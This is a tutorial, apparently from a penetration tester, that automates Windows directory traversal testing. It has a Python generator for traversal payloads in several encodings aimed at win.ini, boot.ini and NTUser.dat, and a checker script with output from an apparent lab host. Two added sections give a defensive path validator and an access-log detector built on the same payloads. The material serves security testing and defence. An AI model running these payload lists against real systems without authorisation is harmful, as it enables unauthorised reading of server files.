Automating Windows LFI
Introduction
When testing for directory traversal on a Windows system I commonly spend a significant amount of time manually editing my traversal strings, so I automated it.
Tools Needed
We will be using the SecLists repository on GitHub by danielmiessler. Specifically, we are going to be using this file:
Here are the modified contents. For the sake of simplicity in this tool, we will be omitting several lines and checking only for the existence of a select few files.
C:/Users/Administrator/NTUser.dat
C:/boot.ini
C:/Windows/win.ini
C:/WINNT/win.ini
win.ini
We also need a list of traversal strings that will be used to test for LFI. Something like this:
../
..\
...//
Writing the Code
Our goal here is to build a list of paths to request, each one a traversal string prepended to one of the filenames we want to test. For a single filename, the list looks something like:
../C:/Users/Administrator/NTUser.dat
../../C:/Users/Administrator/NTUser.dat
../../../C:/Users/Administrator/NTUser.dat
../../../../C:/Users/Administrator/NTUser.dat
../../../../../C:/Users/Administrator/NTUser.dat
../../../../../../C:/Users/Administrator/NTUser.dat
../../../../../../../C:/Users/Administrator/NTUser.dat
../../../../../../../../C:/Users/Administrator/NTUser.dat
../../../../../../../../../C:/Users/Administrator/NTUser.dat
We want a list like this for each filename we want to check. If we ran this over the entire SecLists file we would have several thousand paths to check, which would slow things down considerably.
Creating the List of URLs to Test
We write a script that loops over our tokens and our filenames, writing every combination to a file.
#!/usr/bin/env python3
# create a list of traversal tokens
tokens = [
    "../",
    "....//",
    "....\\",
    "....\\\\",
    "..\\",
    "..././",
    "..\\/",  # the literal characters ..\/ ; "\/" is not a valid escape in Python 3
    "%2e%2e%2f",
    "%252e%252e%252f",
    "%c0%ae%c0%ae%c0%af",
    "%uff0e%uff0e%u2215",
    "%uff0e%uff0e%u2216",
]

# create a list of filenames
filenames = [
    "C:/Users/Administrator/NTUser.dat",
    "C:/boot.ini",
    "C:/Windows/win.ini",
    "C:/WINNT/win.ini",
    "win.ini",
]


# create traversal strings: the token repeated 1 to 9 times in front of the filename
def stringify(token, filename):
    strings = []
    for i in range(1, 10):
        strings.append(token * i + filename)
    return strings


# open the output file once, in write mode, so a re-run does not append duplicates
with open("windows-lfi-list.txt", "w") as f:
    # loop through each list
    for token in tokens:
        for filename in filenames:
            # get list of traversal strings
            traversal_strings = stringify(token, filename)
            print(traversal_strings)
            # write strings to file
            for s in traversal_strings:
                f.write("%s\n" % s)
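The generator above produces exactly the strings a server-side path check has to refuse. As an added example, not part of the original post, here is a Python 3 validation routine for a web application that serves files from a directory. It canonicalizes the request the way the encoded tokens demand (repeated percent-decoding, rejection of the non-standard %u form and of overlong UTF-8, backslash normalization) and then refuses anything that names a drive letter, contains a dot-only path segment, or resolves outside the web root. The TRAVERSAL_TOKENS list is copied from the script as test input; the web root, the function names and the regexes are my own assumptions.

```python
import os
import re
from urllib.parse import unquote

# The traversal tokens from the generator script, reused here as test input (constructed).
TRAVERSAL_TOKENS = [
    "../", "....//", "....\\", "....\\\\", "..\\", "..././", "..\\/",
    "%2e%2e%2f", "%252e%252e%252f", "%c0%ae%c0%ae%c0%af",
    "%uff0e%uff0e%u2215", "%uff0e%uff0e%u2216",
]

DOT_ONLY_SEGMENT = re.compile(r"^\.{2,}$")   # '..', '...', '....' (Windows strips trailing dots)
DRIVE_LETTER = re.compile(r"^[A-Za-z]:")      # 'C:/...' must never come from a client


def canonicalize(requested: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing, then normalise backslashes to '/'.

    Raises ValueError for the non-standard %uXXXX form, for overlong UTF-8 such as %c0%ae
    and for more than max_rounds layers of encoding. UnicodeDecodeError is a subclass of
    ValueError, so callers only catch one type.
    """
    if "%u" in requested.lower():
        raise ValueError("non-standard %u encoding")
    current = requested
    for _ in range(max_rounds):
        decoded = unquote(current, errors="strict")  # strict: overlong byte sequences raise
        if decoded == current:
            break
        current = decoded
    else:
        raise ValueError("too many layers of percent-encoding")
    return current.replace("\\", "/")


def resolve_safe_path(web_root: str, requested: str):
    """Return the absolute file path under web_root for a request, or None to refuse it."""
    try:
        path = canonicalize(requested)
    except ValueError:
        return None
    if DRIVE_LETTER.match(path):
        return None
    segments = [s for s in path.split("/") if s not in ("", ".")]
    if any(DOT_ONLY_SEGMENT.match(s) for s in segments):
        return None
    root = os.path.abspath(web_root)
    target = os.path.abspath(os.path.join(root, *segments))
    # defence in depth: whatever slipped past the segment check must still sit under root
    try:
        if os.path.commonpath([root, target]) != root:
            return None
    except ValueError:  # different drives on Windows
        return None
    return target


if __name__ == "__main__":
    root = "/var/www/html"  # constructed example root
    refused = sum(
        resolve_safe_path(root, token * depth + "win.ini") is None
        for token in TRAVERSAL_TOKENS for depth in range(1, 10)
    )
    print("refused %d of %d traversal strings" % (refused, 9 * len(TRAVERSAL_TOKENS)))
    print("plain request resolves to", resolve_safe_path(root, "css/site.css"))
```

The segment check does the real work; the commonpath comparison is there so that a future encoding the decoder does not anticipate still cannot produce a path outside the root.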
Testing for LFI with our new file list
Now that we have our list, we can test whether any of these files can be read from a host.
We write a Python script that accepts a file containing the list of paths to test and a base URL.
#!/usr/bin/env python3
# date 2020-06-22
# author kegn
import sys
import requests


def check_files(filename, base_url):
    with open(filename) as f:
        lines = f.read().splitlines()
    for i in lines:
        url = base_url + i
        try:
            # a timeout keeps one unresponsive request from stalling the whole list
            content = requests.get(url, timeout=10)
        except requests.RequestException as e:
            print("[!] Request failed for %s : %s" % (url, e))
            continue
        # status 200 on its own is a weak signal: an application that answers 200 for
        # every path reports every string here, so confirm hits by hand. Some client
        # libraries (newer urllib3 releases used by requests may do this) also normalise
        # "../" out of the path before sending, so check with a proxy what reaches the server.
        if content.status_code == 200:
            print("[*] Found at : " + url)
        else:
            # print("[*] Nothing found - testing next string")
            pass


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print(" ")
        print("Usage : python lfi-checker filelist-to-check http://10.10.10.10/")
        print(" ")
    else:
        check_files(sys.argv[1], sys.argv[2])
        print("[*] script complete")
Script output:
[root@kadi lfi-checker]# ./lfi-windows.py windows-lfi-list.txt http://10.10.10.184/
[*] Found at : http://10.10.10.184/../../../windows/win.ini
[*] Found at : http://10.10.10.184/../../../../windows/win.ini
[*] Found at : http://10.10.10.184/../../../../../windows/win.ini
[*] Found at : http://10.10.10.184/../../../../../../windows/win.ini
[*] Found at : http://10.10.10.184/../../../../../../../windows/win.ini
[*] Found at : http://10.10.10.184/../../../../../../../../windows/win.ini
[*] Found at : http://10.10.10.184/../../../../../../../../../windows/win.ini
[*] Found at : http://10.10.10.184/..\..\..\windows/win.ini
[*] Found at : http://10.10.10.184/..\..\..\..\windows/win.ini
[*] Found at : http://10.10.10.184/..\..\..\..\..\windows/win.ini
[*] Found at : http://10.10.10.184/..\..\..\..\..\..\windows/win.ini
[*] Found at : http://10.10.10.184/..\..\..\..\..\..\..\windows/win.ini
[*] Found at : http://10.10.10.184/..\..\..\..\..\..\..\..\windows/win.ini
[*] Found at : http://10.10.10.184/..\..\..\..\..\..\..\..\..\windows/win.ini
[*] Found at : http://10.10.10.184/..\/..\/..\/windows/win.ini
[*] Found at : http://10.10.10.184/..\/..\/..\/..\/windows/win.ini
[*] Found at : http://10.10.10.184/..\/..\/..\/..\/..\/windows/win.ini
[*] Found at : http://10.10.10.184/..\/..\/..\/..\/..\/..\/windows/win.ini
[*] Found at : http://10.10.10.184/..\/..\/..\/..\/..\/..\/..\/windows/win.ini
[*] Found at : http://10.10.10.184/..\/..\/..\/..\/..\/..\/..\/..\/windows/win.ini
[*] Found at : http://10.10.10.184/..\/..\/..\/..\/..\/..\/..\/..\/..\/windows/win.ini
[*] Found at : http://10.10.10.184/%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
[*] Found at : http://10.10.10.184/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
[*] Found at : http://10.10.10.184/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
[*] Found at : http://10.10.10.184/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
[*] Found at : http://10.10.10.184/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
[*] Found at : http://10.10.10.184/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
[*] Found at : http://10.10.10.184/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
[*] script complete
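The checker above shows the tester's side; the same request strings are what lands in the target's access log. As an added example that is not part of the original post, here is a Python 3 scanner for Apache-style combined log lines that flags the traversal encodings the generator produces (matched raw, before any decoding, because that is how the server logs them), groups attempts by client address and singles out the ones that drew a 2xx, which are the lines an incident responder triages first. The log lines are constructed to mirror the post's output; the function names, the regexes and the client addresses are my own assumptions.

```python
import re
from collections import defaultdict

# Apache/nginx "combined" access-log format: client IP, identd, user, timestamp,
# request line, status, bytes (referer and user-agent follow but are not needed here).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Raw traversal markers as the server logs them, before any decoding: '..' in plain,
# percent-, double-percent-, overlong-UTF-8 (%c0%ae) or %u-encoded form, followed by
# a separator in one of the same encodings, or by the './' left behind by the
# '..././' token. 'release..notes.html' does not match because no separator follows.
TRAVERSAL_RE = re.compile(
    r"(?:\.\.|%2e%2e|%252e%252e|%c0%ae%c0%ae|%uff0e%uff0e)"
    r"(?:[\\/]|%2f|%5c|%252f|%c0%af|%u2215|%u2216|\./)",
    re.IGNORECASE,
)

# Constructed log lines modelled on the post's output: one scanner at 192.0.2.10 trying
# several encodings against win.ini, and an ordinary client at 198.51.100.7.
SAMPLE_LOG = [
    '198.51.100.7 - - [22/Jun/2020:14:02:58 +0000] "GET /index.html HTTP/1.1" 200 5124 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [22/Jun/2020:14:03:11 +0000] "GET /../windows/win.ini HTTP/1.1" 404 196 "-" "python-requests/2.23.0"',
    '192.0.2.10 - - [22/Jun/2020:14:03:11 +0000] "GET /../../../windows/win.ini HTTP/1.1" 200 403 "-" "python-requests/2.23.0"',
    '192.0.2.10 - - [22/Jun/2020:14:03:12 +0000] "GET /%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini HTTP/1.1" 200 403 "-" "python-requests/2.23.0"',
    '192.0.2.10 - - [22/Jun/2020:14:03:12 +0000] "GET /%uff0e%uff0e%u2215windows/win.ini HTTP/1.1" 404 196 "-" "python-requests/2.23.0"',
    '198.51.100.7 - - [22/Jun/2020:14:04:02 +0000] "GET /docs/release..notes.html HTTP/1.1" 200 881 "-" "Mozilla/5.0"',
]


def is_traversal(path: str) -> bool:
    """True if the raw request path carries one of the traversal encodings."""
    return TRAVERSAL_RE.search(path) is not None


def analyze(log_lines):
    """Group traversal attempts by client IP.

    A 2xx answer to such a request does not prove the file was served (some
    applications answer 200 for every path), but it is the line to triage first.
    """
    report = defaultdict(lambda: {"attempts": 0, "succeeded": 0, "succeeded_paths": []})
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or not is_traversal(m["path"]):
            continue
        entry = report[m["ip"]]
        entry["attempts"] += 1
        if m["status"].startswith("2"):
            entry["succeeded"] += 1
            entry["succeeded_paths"].append(m["path"])
    return dict(report)


if __name__ == "__main__":
    for ip, entry in analyze(SAMPLE_LOG).items():
        print("%s: %d traversal attempts, %d answered 2xx" % (ip, entry["attempts"], entry["succeeded"]))
        for p in entry["succeeded_paths"]:
            print("    triage: %s" % p)
```

Matching on the raw request line rather than a decoded one is deliberate: the encodings are themselves the signal, and a host that only logs the normalised path would hide which bypass was tried.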